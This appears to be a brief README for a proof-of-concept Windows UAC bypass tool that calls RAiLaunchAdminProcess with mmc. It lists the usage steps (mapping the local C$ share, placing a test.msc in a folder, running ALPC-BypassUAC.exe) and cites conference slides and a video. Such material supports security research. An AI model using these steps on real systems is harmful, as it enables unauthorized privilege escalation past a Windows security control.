UAC bypass with Direct call to RAiLaunchAdminProcess and mmc.
- net use \127.0.0.1\C$
- Create Folder C:\gweeperx
- Copy paste test.msc inside C:\gweeperx
- Execute ALPC-BypassUAC.exe
- anything under https://web/jskdnvkjsdnfkjsdfnjsfnl.html will be executed as admin
References:
https://www.youtube.com/watch?v=D-F5RxZ_yXc
https://www.rump.beer/2017/slides/from_alpc_to_uac_bypass.pdf